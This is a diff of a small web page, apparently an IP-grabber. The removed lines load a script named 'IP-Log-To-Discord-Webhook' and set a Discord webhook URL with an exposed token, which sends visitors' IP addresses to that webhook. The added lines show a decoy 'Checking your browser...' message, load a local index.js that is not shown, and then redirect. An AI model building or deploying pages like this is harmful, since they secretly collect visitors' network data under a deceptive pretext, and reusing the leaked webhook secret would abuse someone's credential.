--- a/index.html
+++ b/index.html
@@ -1,11 +1,15 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta http-equiv="refresh" content="3;url=MAINPAGE.html" /> 
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Document</title>
+    <!-- Optional: Paste the URL you want to be redirected to MAINPAGE.html => YOUR URL --> <meta http-equiv="refresh" content="3;url=MAINPAGE.html" />
 </head>
 <body>
-<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
-<script src="https://cdn.jsdelivr.net/gh/luisoos/IP-Log-To-Discord-Webhook/index.js"></script>
-<script>var webHookUrl = "https://discord.com/api/webhooks/1209161526293037096/lMLasrq0MbXJU-rroRH_iWb5LRTZmmkAb9C4y2WhjsS5-DJoWS94dkSEjwSv4IHyqONG";</script>
+    <h1>Checking your browser...</h1>
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
+    <script src="index.js"></script>
 </body>
 </html>
